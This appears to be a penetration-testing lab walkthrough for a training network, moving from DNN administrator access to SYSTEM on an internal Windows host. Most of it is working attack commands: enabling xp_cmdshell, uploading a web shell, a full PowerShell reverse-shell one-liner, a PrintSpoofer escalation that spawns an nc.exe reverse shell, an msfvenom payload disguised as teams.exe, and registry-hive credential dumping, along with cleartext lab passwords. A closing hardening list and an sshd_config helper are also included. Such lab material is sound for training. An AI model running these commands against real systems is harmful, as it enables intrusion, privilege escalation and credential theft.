Exploitation & Privilege Escalation turns the credentials recovered from the NFS share into SYSTEM-level access on an internal host. The chain: log in to DotNetNuke (DNN) with the administrator password found in web.config, enable xp_cmdshell from the DNN SQL console, loosen the allowed upload extensions to land a web shell, escalate from the IIS application pool account to SYSTEM with PrintSpoofer (SeImpersonatePrivilege), dump the registry hives for local and cached domain credentials, and keep several independent ways back in so internal access does not depend on a single foothold.
# Credential validation from NFS discovery
Administrator:D0tn31Nuk3R0ck$$@123
# Source: /DEV01/DNN/web.config
# Login verification
http://172.16.8.20/Login?returnurl=%2fadmin
# Result: SuperUser administrator account access
# Findings to document:
1. Insecure File Shares (NFS anonymous access)
2. Sensitive Data on File Shares (credentials in config)

-- Enable xp_cmdshell for command execution (run from the DNN admin SQL Console)
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
-- Test command execution
EXEC xp_cmdshell 'whoami'
-- Output: nt service\mssql$sqlexpress (commands run as the SQL Express service account, not the web app pool identity)

# DNN file upload configuration:
1. Settings → Security → More → More Security Settings
2. Allowable File Extensions: add asp,aspx,exe,SAVE to the list
3. Save configuration
# Upload capabilities enabled:
- ASP web shells (.asp, .aspx)
- Executable files (.exe)
- Registry dumps (.SAVE)

# ASP web shell upload
1. Download newcmdasp.asp from GitHub
2. Upload via DNN File Management (/admin/file-management)
3. Access web shell via uploaded file URL
4. Test command execution: whoami
# Result: iis apppool\dotnetnukeapppool
# Privileges: SeImpersonatePrivilege, which IIS app pool identities hold by default and which PrintSpoofer abuses to reach SYSTEM

# Reverse shell payload (from web shell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('172.16.8.120',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Listener setup (on dmz01):
nc -nvlp 9999
# Result: Interactive PowerShell session

# Prerequisites:
1. Upload nc.exe and PrintSpoofer64.exe via DNN
2. Verify SeImpersonate privilege
3. Setup listener on dmz01
# PrintSpoofer execution:
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 172.16.8.120 443 -e cmd"
# Expected privileges:
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
# Result: NT AUTHORITY\SYSTEM shell

# Registry hive dumping (as SYSTEM). Run from c:\DotNetNuke\Portals\0 so the hives land in the portal folder the DNN file manager serves (.SAVE is in the allowed extensions added earlier):
reg save HKLM\SYSTEM SYSTEM.SAVE
reg save HKLM\SECURITY SECURITY.SAVE
reg save HKLM\SAM SAM.SAVE
# Download via DNN file manager:
1. Navigate to /admin/file-management
2. Download SYSTEM.SAVE, SECURITY.SAVE, SAM.SAVE
3. Transfer to attack host for analysis

# Credential extraction
secretsdump.py LOCAL -system SYSTEM.SAVE -sam SAM.SAVE -security SECURITY.SAVE
# Local account hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[NT_HASH]
mpalledorous:1001:aad3b435b51404eeaad3b435b51404ee:[NT_HASH]
# Domain cached credentials (DCC2/mscache v2: crackable offline with hashcat mode 2100, not usable for pass-the-hash):
INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#[HASH]
# LSA Secrets:
DefaultPassword: Gr8hambino!
# Associated user: hporter (domain account). DefaultPassword is the Winlogon autologon password; secretsdump pairs it with the DefaultDomainName/DefaultUserName values, here hporter.

# First domain credential pair discovered:
hporter:Gr8hambino!
# Source: LSA Secrets DefaultPassword
# Validation from SYSTEM shell:
net user hporter /domain
# Output: Domain Users group membership confirmed
# Password last set: 6/1/2022
# Account active: Yes

# Scenario: Direct reverse shell from DEV01 to attack host
# 1. Generate payload (LHOST is dmz01's internal address, which DEV01 can reach; port 443 there is relayed to the handler in step 3)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.8.120 LPORT=443 -f exe -o teams.exe
# 2. Setup multi/handler (attack host)
use multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 7000
run
# 3. SSH reverse port forwarding (from the attack host to dmz01): dmz01 binds 172.16.8.120:443 and relays each connection back through the tunnel to port 7000 on the attack host, i.e. the handler. Binding a non-loopback address on dmz01 requires GatewayPorts in its sshd_config.
ssh -i dmz01_key -R 172.16.8.120:443:0.0.0.0:7000 root@TARGET_IP -vN
# 4. Execute payload on DEV01
teams.exe
# Result: Meterpreter session through port forwarding

# GatewayPorts configuration (if needed):
# Edit /etc/ssh/sshd_config on dmz01 and change the GatewayPorts line from 'no' to:
GatewayPorts yes
# Keep the directive in the global section (above any Match block) and do not put a trailing comment on the same line; some sshd versions reject it as garbage at end of line.
# Reload SSH service:
service sshd reload
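Hand-editing sshd_config is where assessments leave stray changes behind. As an added example (not from the page), a helper that sets a global sshd directive in place, inserts it above any Match block (a directive placed after Match applies only to that block, and sshd takes the first global occurrence), backs the file up once and reverts it afterwards. The sample sshd_config is constructed, not dmz01's real file, and the .pentest.bak suffix is an assumption.

```python
import re
import shutil
import tempfile
from pathlib import Path

# Active directive: "Keyword value" or "Keyword=value". Comment lines yield None.
_DIRECTIVE = re.compile(r"^([A-Za-z0-9]+)(?:\s*=\s*|\s+)(.*)$")


def _directive(line):
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    m = _DIRECTIVE.match(s)
    return (m.group(1).lower(), m.group(2).strip()) if m else None


def get_sshd_option(config_text, key):
    """Effective global value of key: the first active directive before any Match block, else None."""
    for line in config_text.splitlines():
        d = _directive(line)
        if d is None:
            continue
        if d[0] == "match":
            return None
        if d[0] == key.lower():
            return d[1]
    return None


def set_sshd_option(config_text, key, value):
    """Return config_text with `key value` set exactly once in the global section.
    An existing global line is rewritten in place (duplicates dropped); otherwise the
    directive is inserted just before the first Match block. Commented defaults such
    as '#GatewayPorts no' and lines inside Match blocks are left untouched."""
    out, done, in_match = [], False, False
    for line in config_text.splitlines():
        d = _directive(line)
        if d and d[0] == "match":
            if not done:
                out.append(f"{key} {value}")
                done = True
            in_match = True
        elif d and d[0] == key.lower() and not in_match:
            if not done:
                out.append(f"{key} {value}")
                done = True
            continue  # drop the old global line (and any duplicate)
        out.append(line)
    if not done:
        out.append(f"{key} {value}")
    return "\n".join(out) + "\n"


def apply_change(path, key, value, suffix=".pentest.bak"):
    """Back the file up once (assumed suffix), then rewrite it. Returns the backup path."""
    p = Path(path)
    backup = p.with_name(p.name + suffix)
    if not backup.exists():
        shutil.copy2(p, backup)
    p.write_text(set_sshd_option(p.read_text(), key, value))
    return backup


def revert_change(path, suffix=".pentest.bak"):
    """Restore the pre-assessment file from the backup and remove the backup."""
    p = Path(path)
    backup = p.with_name(p.name + suffix)
    shutil.move(str(backup), str(p))


# Constructed sample, not dmz01's real sshd_config.
SAMPLE_SSHD_CONFIG = """\
# constructed sample sshd_config
Port 22
#GatewayPorts no
PermitRootLogin yes
Match User git
    GatewayPorts no
"""


def roundtrip_demo():
    """Apply and revert on a temporary copy; returns (value while applied, restored_ok)."""
    with tempfile.TemporaryDirectory() as d:
        cfg = Path(d) / "sshd_config"
        cfg.write_text(SAMPLE_SSHD_CONFIG)
        apply_change(cfg, "GatewayPorts", "yes")
        while_applied = get_sshd_option(cfg.read_text(), "GatewayPorts")
        revert_change(cfg)
        return while_applied, cfg.read_text() == SAMPLE_SSHD_CONFIG


if __name__ == "__main__":
    print(set_sshd_option(SAMPLE_SSHD_CONFIG, "GatewayPorts", "yes"))
    print(roundtrip_demo())
```

Run `sshd -t` on dmz01 after `apply_change` and before reloading: it exits non-zero if the file no longer parses, which is the failure you want to see before the only route into the internal network is the session you are sitting in.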
# Security consideration:
- Client approval required for config changes
- Document all modifications
- Revert changes post-assessment
- Note security implications in report

# Method 1: SQL Console → xp_cmdshell
DNN Admin → Settings → SQL Console → Command execution
# Method 2: File Upload → ASP Web Shell
DNN Admin → File Extensions → Upload newcmdasp.asp → RCE
# Method 3: Direct Credential Usage
hporter:Gr8hambino! → SMB/RDP/WinRM access (as far as a plain Domain Users member is permitted on each host)
# Method 4: Pass-the-Hash
Administrator NT hash → Direct authentication

# Local administrator access:
- SAM database hash extraction
- Pass-the-hash authentication capability
- Local admin account compromise
# Domain account access:
- hporter:Gr8hambino! (cleartext)
- Domain Users group membership
- Internal AD enumeration capability
# System-level access:
- NT AUTHORITY\SYSTEM shell
- Registry access and modification
- Service manipulation capabilities

# Domain information:
Domain: INLANEFREIGHT.LOCAL
Domain Controller: 172.16.8.3
Domain SID: S-1-5-21-2814148634-3729814499-1637837074
# Compromised accounts:
hporter (Domain Users) - cleartext password
Administrator (DEV01 local) - NT hash
mpalledorous (DEV01 local) - NT hash
# Network positioning:
- SYSTEM access on DEV01 (172.16.8.20)
- Root access on dmz01 (172.16.8.120)
- Direct connectivity to Domain Controller

# AD enumeration priorities:
1. BloodHound data collection
2. Domain user enumeration
3. Service account discovery
4. Group membership analysis
5. Trust relationship mapping
# Lateral movement opportunities:
- Kerberoasting attacks
- ASREPRoasting attempts
- Password spraying campaigns
- SMB share enumeration
- Privilege escalation hunting

# Lab 1: SAM Database Extraction
1. DNN admin access → Administrator:D0tn31Nuk3R0ck$$@123
2. File extension modification → asp,aspx,exe,SAVE
3. Web shell upload → newcmdasp.asp deployment
4. PrintSpoofer exploitation → SYSTEM privilege escalation
5. Registry hive dumping → SAM, SYSTEM, SECURITY
6. Secretsdump analysis → Administrator NT hash extraction
# Lab 2: Administrator Desktop Flag
1. SYSTEM shell establishment → PrintSpoofer execution
2. Privilege verification → NT AUTHORITY\SYSTEM
3. Flag retrieval → C:\Users\Administrator\Desktop\flag.txt

# Technical skills:
- DNN administrative functionality abuse
- SQL Server xp_cmdshell exploitation
- SeImpersonate privilege escalation
- Windows registry credential extraction
# Professional methodology:
- Multiple attack vector development
- Persistence mechanism establishment
- Evidence collection standards
- Systematic privilege escalation
# Real-world scenarios:
- Development environment exploitation
- Configuration file credential mining
- Built-in functionality abuse
- Domain preparation techniques

# DNN hardening:
- Disable SQL Console access
- Restrict file upload extensions
- Implement admin approval workflows
- Regular credential rotation
# SQL Server security:
- Disable xp_cmdshell by default
- Implement least privilege access
- Monitor database admin activities
- Use dedicated service accounts
# File share security:
- Disable anonymous NFS access
- Implement proper access controls
- Encrypt sensitive configuration sections (ASP.NET protected configuration for web.config) rather than leaving database credentials in cleartext on a share
- Regular share permission audits